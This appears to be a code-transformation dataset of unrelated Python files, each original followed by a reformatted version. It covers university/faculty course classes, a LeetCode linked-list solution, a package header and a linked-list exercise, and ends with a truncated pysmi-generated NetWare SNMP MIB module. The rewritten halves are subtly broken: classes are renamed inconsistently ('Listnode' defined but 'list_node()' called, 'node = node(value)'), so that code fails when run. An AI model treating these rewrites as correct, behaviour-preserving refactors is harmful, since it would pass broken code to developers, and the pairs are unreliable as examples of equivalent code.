-------
`University`
The self university object
"""
if faculty not in self.faculties: self.faculties.append(faculty)
faculty.university = self
return self
class Faculty:
"""Wrapper for faculty item"""
def __init__(self, name=None, university=None, majors=[], aliases=[]):
self.name = name
self.aliases = aliases
self.univerisity = university
self.majors = majors
def set_university(self, university):
"""
Associate current faculty to a given university, works both ways.
It first checks if the given university already have current faculty
associated. Otherwise, it adds to the `faculties` attributes. Then,
it changes the `university` parent attribute on current faculty object
to the given university.
Parameters
----------
university : `University`
The university object that is going to be associated with
Returns
-------
`Faculty`
The self faculty object
"""
if self not in university.faculties: university.faculties.append(self)
self.university = university
return self
def add_major(self, major):
"""
Associate a single major to current faculty, works both ways.
It first checks if current faculty already have the given major
associated. Otherwise, it adds to the `majors` attributes. Then,
it changes the `faculty` parent attribute on the major object
to current faculty.
Parameters
----------
major : Major
The major object that is going to be associated with
Returns
-------
Faculty
The self faculty object
"""
if major not in self.majors: self.majors.append(major)
major.faculty = self
return self
class Major:
def __init__(self, name=None, faculty=None, courses=[], aliases=[]):
self.name = name
self.aliases = aliases
self.faculty = faculty
self.courses = courses
def set_faculty(self, faculty):
"""
Associate current major to a given faculty, works both ways.
It first checks if the given faculty already have current major
associated. Otherwise, it adds to the `majors` attributes. Then,
it changes the `faculty` parent attribute on current major object
to the given faculty.
Parameters
----------
faculty : `Faculty`
The faculyt object that is going to be associated with
Returns
-------
`Major`
The self major object
"""
if self not in faculty.majors: faculty.majors.append(self)
self.faculty = faculty
return self
def add_course(self, course):
"""
Associate a single course to current major, works both ways.
It first checks if current major already have the given course
associated. Otherwise, it adds to the `courses` attributes. Then,
it changes the `major` parent attribute on the course object
to current major.
Parameters
----------
course : `Course`
The course object that is going to be associated with
Returns
-------
`Major`
The self major object
"""
if course not in self.courses: self.courses.append(course)
course.major = self
return self
class Course:
def __init__(self, name=None, credit=1, major=None, aliases=[]):
self.name = name
self.major = major
self.credit = credit
self.aliases = aliases
def set_major(self, major):
"""
Associate current course to a given major, works both ways.
It first checks if the given major already have current course
associated. Otherwise, it adds to the `courses` attributes. Then,
it changes the `major` parent attribute on current course object
to the given major.
Parameters
----------
major : `Major`
The major object that is going to be associated with
Returns
-------
`Course`
The self course object
"""
if self not in major.courses: major.courses.append(self)
self.major = major
return self
| """
instance.py contains the basic classes of the items in a study plan card,
like university, faculty, major, and course. This was made to 'objectify' the
data fetched from the courses.json file
"""
class University:
"""Wrapper for University item"""
def __init__(self, name=None, faculties=[], aliases=[]):
self.name = name
self.aliases = aliases
self.faculties = faculties
def add_faculty(self, faculty):
"""
Associate a single faculty to current university, works both ways.
It first checks if current university already have the given faculty
associated. Otherwise, it adds to the `faculties` attributes. Then,
it changes the `university` parent attribute on the faculty object
to current university.
Parameters
----------
faculty : `Faculty`
The faculty object that is going to be associated with
Returns
-------
`University`
The self university object
"""
if faculty not in self.faculties:
self.faculties.append(faculty)
faculty.university = self
return self
class Faculty:
"""Wrapper for faculty item"""
def __init__(self, name=None, university=None, majors=[], aliases=[]):
self.name = name
self.aliases = aliases
self.univerisity = university
self.majors = majors
def set_university(self, university):
"""
Associate current faculty to a given university, works both ways.
It first checks if the given university already have current faculty
associated. Otherwise, it adds to the `faculties` attributes. Then,
it changes the `university` parent attribute on current faculty object
to the given university.
Parameters
----------
university : `University`
The university object that is going to be associated with
Returns
-------
`Faculty`
The self faculty object
"""
if self not in university.faculties:
university.faculties.append(self)
self.university = university
return self
def add_major(self, major):
"""
Associate a single major to current faculty, works both ways.
It first checks if current faculty already have the given major
associated. Otherwise, it adds to the `majors` attributes. Then,
it changes the `faculty` parent attribute on the major object
to current faculty.
Parameters
----------
major : Major
The major object that is going to be associated with
Returns
-------
Faculty
The self faculty object
"""
if major not in self.majors:
self.majors.append(major)
major.faculty = self
return self
class Major:
def __init__(self, name=None, faculty=None, courses=[], aliases=[]):
self.name = name
self.aliases = aliases
self.faculty = faculty
self.courses = courses
def set_faculty(self, faculty):
"""
Associate current major to a given faculty, works both ways.
It first checks if the given faculty already have current major
associated. Otherwise, it adds to the `majors` attributes. Then,
it changes the `faculty` parent attribute on current major object
to the given faculty.
Parameters
----------
faculty : `Faculty`
The faculyt object that is going to be associated with
Returns
-------
`Major`
The self major object
"""
if self not in faculty.majors:
faculty.majors.append(self)
self.faculty = faculty
return self
def add_course(self, course):
"""
Associate a single course to current major, works both ways.
It first checks if current major already have the given course
associated. Otherwise, it adds to the `courses` attributes. Then,
it changes the `major` parent attribute on the course object
to current major.
Parameters
----------
course : `Course`
The course object that is going to be associated with
Returns
-------
`Major`
The self major object
"""
if course not in self.courses:
self.courses.append(course)
course.major = self
return self
class Course:
def __init__(self, name=None, credit=1, major=None, aliases=[]):
self.name = name
self.major = major
self.credit = credit
self.aliases = aliases
def set_major(self, major):
"""
Associate current course to a given major, works both ways.
It first checks if the given major already have current course
associated. Otherwise, it adds to the `courses` attributes. Then,
it changes the `major` parent attribute on current course object
to the given major.
Parameters
----------
major : `Major`
The major object that is going to be associated with
Returns
-------
`Course`
The self course object
"""
if self not in major.courses:
major.courses.append(self)
self.major = major
return self |
# Definition for singly-linked list.
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def deleteDuplicates(self, head: ListNode) -> ListNode:
if not head:
return head
dummy_head = ListNode()
dummy_head.next = head
prev = dummy_head
while head and head.next:
if head.val == head.next.val:
while head.next and head.val == head.next.val:
head = head.next
prev.next = head.next
head = prev.next
else:
prev, head = head, head.next
return dummy_head.next | class Listnode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def delete_duplicates(self, head: ListNode) -> ListNode:
if not head:
return head
dummy_head = list_node()
dummy_head.next = head
prev = dummy_head
while head and head.next:
if head.val == head.next.val:
while head.next and head.val == head.next.val:
head = head.next
prev.next = head.next
head = prev.next
else:
(prev, head) = (head, head.next)
return dummy_head.next |
# -*- coding: utf-8 -*-
"""Top-level package for cui_okinawa."""
__author__ = """anosillus"""
__email__ = "anosillus@gmail.com"
__version__ = "0.1.0"
| """Top-level package for cui_okinawa."""
__author__ = 'anosillus'
__email__ = 'anosillus@gmail.com'
__version__ = '0.1.0' |
class Node:
def __init__(self, value=""):
self.value = value
self.next = None
class LinkedList():
def __init__(self):
self.head = None
self.values=[]
def insert(self, value):
self.values.append(value)
node = Node(value)
if self.head:
node.next = self.head
self.head = node
def includes(self,value):
current=self.head
while current:
if current.value==value:
return True
else:
current=current.next
return False
def __str__(self):
string = ""
current = self.head
while current:
string += f"{str(current.value)} -> "
current = current.next
string += "NULL"
return string
def appendvalue(self,value):
new_node=Node(value)
if self.head==None:
self.head=new_node
else:
currunt=self.head
while currunt.next:
currunt=currunt.next
currunt.next=new_node
def insert_befor(self,value,new_value):
new_node=Node(new_value)
if self.head.value==value:
self.insert(new_value)
else:
currunt=self.head
while currunt.next:
if currunt.next.value==value:
new_node.next=currunt.next
currunt.next=new_node
break
currunt=currunt.next
def insert_after(self,value,new_value):
new_node=Node(new_value)
if self.head.value==value:
self.head.next=new_node
else:
currunt=self.head
while currunt:
if currunt.value==value:
new_node.next=currunt.next
currunt.next=new_node
break
currunt=currunt.next
def kth_from_end(self,num):
current=self.head
sol=[]
if num<0:
return 'k is negative, please enter a positive number'
counter=0
while current.next:
counter +=1
current=current.next
if counter+1==num:
return 'the k value is the same as the length of the list, please change it'
if counter<num:
raise Exception
position=counter-num
current=self.head
for x in range(position):
current=current.next
return current.value
# while current:
# sol.append(current.value)
# current=current.next
# if len(sol)> num:
# sol.reverse()
# return sol[num]
# elif len(sol)==num:
# return 'the k value is the same as the length of the list, please change it'
# elif len(sol)<num:
# raise Exception
def zip_lists(first:LinkedList,second:LinkedList):
var1 =first.head
var2=second.head
new=LinkedList()
while True:
if var1:
new.appendvalue(var1.value)
var1=var1.next
if var2:
new.appendvalue(var2.value)
var2=var2.next
if not var1 and not var2 :
break
return new
if __name__ == "__main__":
first=LinkedList()
second=LinkedList()
first.appendvalue(11)
first.appendvalue(12)
first.appendvalue(13)
first.appendvalue(14)
second.appendvalue(21)
second.appendvalue(22)
second.appendvalue(23)
second.appendvalue(24)
new=zip_lists(first,second)
print(new)
| class Node:
def __init__(self, value=''):
self.value = value
self.next = None
class Linkedlist:
def __init__(self):
self.head = None
self.values = []
def insert(self, value):
self.values.append(value)
node = node(value)
if self.head:
node.next = self.head
self.head = node
def includes(self, value):
current = self.head
while current:
if current.value == value:
return True
else:
current = current.next
return False
def __str__(self):
string = ''
current = self.head
while current:
string += f'{str(current.value)} -> '
current = current.next
string += 'NULL'
return string
def appendvalue(self, value):
new_node = node(value)
if self.head == None:
self.head = new_node
else:
currunt = self.head
while currunt.next:
currunt = currunt.next
currunt.next = new_node
def insert_befor(self, value, new_value):
new_node = node(new_value)
if self.head.value == value:
self.insert(new_value)
else:
currunt = self.head
while currunt.next:
if currunt.next.value == value:
new_node.next = currunt.next
currunt.next = new_node
break
currunt = currunt.next
def insert_after(self, value, new_value):
new_node = node(new_value)
if self.head.value == value:
self.head.next = new_node
else:
currunt = self.head
while currunt:
if currunt.value == value:
new_node.next = currunt.next
currunt.next = new_node
break
currunt = currunt.next
def kth_from_end(self, num):
current = self.head
sol = []
if num < 0:
return 'k is negative, please enter a positive number'
counter = 0
while current.next:
counter += 1
current = current.next
if counter + 1 == num:
return 'the k value is the same as the length of the list, please change it'
if counter < num:
raise Exception
position = counter - num
current = self.head
for x in range(position):
current = current.next
return current.value
def zip_lists(first: LinkedList, second: LinkedList):
var1 = first.head
var2 = second.head
new = linked_list()
while True:
if var1:
new.appendvalue(var1.value)
var1 = var1.next
if var2:
new.appendvalue(var2.value)
var2 = var2.next
if not var1 and (not var2):
break
return new
if __name__ == '__main__':
first = linked_list()
second = linked_list()
first.appendvalue(11)
first.appendvalue(12)
first.appendvalue(13)
first.appendvalue(14)
second.appendvalue(21)
second.appendvalue(22)
second.appendvalue(23)
second.appendvalue(24)
new = zip_lists(first, second)
print(new) |
#
# PySNMP MIB module NetWare-Host-Ext-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NetWare-Host-Ext-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:16:26 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueRangeConstraint")
hrDeviceIndex, = mibBuilder.importSymbols("HOST-RESOURCES-MIB", "hrDeviceIndex")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Unsigned32, Counter64, MibIdentifier, Bits, iso, TimeTicks, Integer32, Gauge32, ObjectIdentity, IpAddress, enterprises, NotificationType, Counter32 = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Unsigned32", "Counter64", "MibIdentifier", "Bits", "iso", "TimeTicks", "Integer32", "Gauge32", "ObjectIdentity", "IpAddress", "enterprises", "NotificationType", "Counter32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
class TransportDomain(Integer32):
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))
namedValues = NamedValues(("noAddress", 1), ("ipx", 2), ("ip", 3), ("appleTalkDDP", 4))
class TransportAddress(OctetString):
pass
novell = MibIdentifier((1, 3, 6, 1, 4, 1, 23))
mibDoc = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2))
nwHostExtensions = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27))
nwhrStorage = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2))
nwhrDevice = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 3))
nwhrOdi = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 10))
nwhrStorageTypes = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1))
nwhrStorageVolume = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 1))
nwhrStorageMemoryPermanent = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 2))
nwhrStorageMemoryAlloc = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 3))
nwhrStorageCacheBuffers = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 4))
nwhrStorageCacheMovable = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 5))
nwhrStorageCacheNonMovable = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 6))
nwhrStorageCodeAndDataMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 7))
nwhrStorageDOSMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 8))
nwhrStorageIOEngineMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 9))
nwhrStorageMSEngineMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 10))
nwhrStorageUnclaimedMemory = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 11))
nwhrDeviceTypes = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 1))
nwhrDeviceMirroredServerLink = MibIdentifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 1, 1))
class KBytes(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(0, 2147483647)
class InternationalDisplayString(OctetString):
pass
nwhrDeviceTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2), )
if mibBuilder.loadTexts: nwhrDeviceTable.setStatus('mandatory')
nwhrDeviceEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1), ).setIndexNames((0, "HOST-RESOURCES-MIB", "hrDeviceIndex"))
if mibBuilder.loadTexts: nwhrDeviceEntry.setStatus('mandatory')
nwhrDeviceAdapterIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDeviceAdapterIndex.setStatus('mandatory')
nwhrDeviceControllerNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDeviceControllerNumber.setStatus('mandatory')
nwhrDeviceNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDeviceNumber.setStatus('mandatory')
nwhrProcessorCount = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProcessorCount.setStatus('mandatory')
nwhrPrinterCount = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterCount.setStatus('mandatory')
nwhrDiskStorageCount = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDiskStorageCount.setStatus('mandatory')
nwhrDiskStorageTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6), )
if mibBuilder.loadTexts: nwhrDiskStorageTable.setStatus('mandatory')
nwhrDiskStorageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1), ).setIndexNames((0, "HOST-RESOURCES-MIB", "hrDeviceIndex"))
if mibBuilder.loadTexts: nwhrDiskStorageEntry.setStatus('mandatory')
nwhrDiskStorageHeads = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDiskStorageHeads.setStatus('mandatory')
nwhrDiskStorageCylinders = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDiskStorageCylinders.setStatus('mandatory')
nwhrDiskStorageSectorsPerTrack = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDiskStorageSectorsPerTrack.setStatus('mandatory')
nwhrDiskStorageSectorSize = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDiskStorageSectorSize.setStatus('mandatory')
nwhrDiskStorageBlockSize = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrDiskStorageBlockSize.setStatus('mandatory')
nwhrPhysicalPartitionTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7), )
if mibBuilder.loadTexts: nwhrPhysicalPartitionTable.setStatus('mandatory')
nwhrPhysicalPartitionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1), ).setIndexNames((0, "HOST-RESOURCES-MIB", "hrDeviceIndex"), (0, "NetWare-Host-Ext-MIB", "nwhrPhysicalPartitionIndex"))
if mibBuilder.loadTexts: nwhrPhysicalPartitionEntry.setStatus('mandatory')
nwhrPhysicalPartitionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPhysicalPartitionIndex.setStatus('mandatory')
nwhrPhysicalPartitionType = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("netWare", 2), ("dos", 3), ("inwDos", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPhysicalPartitionType.setStatus('mandatory')
nwhrPhysicalPartitionDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 3), InternationalDisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPhysicalPartitionDescr.setStatus('mandatory')
nwhrPhysicalPartitionSize = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 4), KBytes()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPhysicalPartitionSize.setStatus('mandatory')
nwhrHotfixTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8), )
if mibBuilder.loadTexts: nwhrHotfixTable.setStatus('mandatory')
nwhrHotfixEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1), ).setIndexNames((0, "HOST-RESOURCES-MIB", "hrDeviceIndex"), (0, "NetWare-Host-Ext-MIB", "nwhrPhysicalPartitionIndex"))
if mibBuilder.loadTexts: nwhrHotfixEntry.setStatus('mandatory')
nwhrHotfixUnits = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrHotfixUnits.setStatus('mandatory')
nwhrHotfixTotal = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrHotfixTotal.setStatus('mandatory')
nwhrHotfixUsed = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrHotfixUsed.setStatus('mandatory')
nwhrHotfixReserved = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrHotfixReserved.setStatus('mandatory')
nwhrAdapterCount = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterCount.setStatus('mandatory')
nwhrAdapterTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10), )
if mibBuilder.loadTexts: nwhrAdapterTable.setStatus('mandatory')
nwhrAdapterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1), ).setIndexNames((0, "NetWare-Host-Ext-MIB", "nwhrAdapterIndex"))
if mibBuilder.loadTexts: nwhrAdapterEntry.setStatus('mandatory')
nwhrAdapterIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterIndex.setStatus('mandatory')
nwhrAdapterType = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterType.setStatus('mandatory')
nwhrAdapterDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 3), InternationalDisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDescr.setStatus('mandatory')
nwhrAdapterDriverDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 4), InternationalDisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 128))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDriverDescr.setStatus('mandatory')
nwhrAdapterDriverMajorVer = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDriverMajorVer.setStatus('mandatory')
nwhrAdapterDriverMinorVer = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDriverMinorVer.setStatus('mandatory')
nwhrAdapterPort1 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterPort1.setStatus('mandatory')
nwhrAdapterPort1Len = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterPort1Len.setStatus('mandatory')
nwhrAdapterPort2 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterPort2.setStatus('mandatory')
nwhrAdapterPort2Len = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterPort2Len.setStatus('mandatory')
nwhrAdapterMem1 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterMem1.setStatus('mandatory')
nwhrAdapterMem1Len = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterMem1Len.setStatus('mandatory')
nwhrAdapterMem2 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterMem2.setStatus('mandatory')
nwhrAdapterMem2Len = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterMem2Len.setStatus('mandatory')
nwhrAdapterDMA1 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 15), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDMA1.setStatus('mandatory')
nwhrAdapterDMA2 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 16), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDMA2.setStatus('mandatory')
nwhrAdapterInterrupt1 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 17), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterInterrupt1.setStatus('mandatory')
nwhrAdapterInterrupt2 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 18), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterInterrupt2.setStatus('mandatory')
nwhrAdapterSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 19), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterSlot.setStatus('mandatory')
nwhrAdapterDevices = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrAdapterDevices.setStatus('mandatory')
nwhrMslCount = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslCount.setStatus('mandatory')
nwhrMslTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12), )
if mibBuilder.loadTexts: nwhrMslTable.setStatus('mandatory')
nwhrMslEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1), ).setIndexNames((0, "HOST-RESOURCES-MIB", "hrDeviceIndex"))
if mibBuilder.loadTexts: nwhrMslEntry.setStatus('mandatory')
nwhrMslState = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("offline", 1), ("startup", 2), ("standby", 3), ("active", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslState.setStatus('mandatory')
nwhrMslSpeed = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslSpeed.setStatus('mandatory')
nwhrMslSends = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslSends.setStatus('mandatory')
nwhrMslReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslReceives.setStatus('mandatory')
nwhrMslInErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslInErrors.setStatus('mandatory')
nwhrMslOutErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrMslOutErrors.setStatus('mandatory')
nwhrPrinterTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13), )
if mibBuilder.loadTexts: nwhrPrinterTable.setStatus('mandatory')
nwhrPrinterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1), ).setIndexNames((0, "NetWare-Host-Ext-MIB", "nwhrPrinterID"))
if mibBuilder.loadTexts: nwhrPrinterEntry.setStatus('mandatory')
nwhrPrinterID = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterID.setStatus('mandatory')
nwhrPrinterType = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("local", 2), ("netware", 3), ("unixware", 4)))).setMaxAccess("readonly")
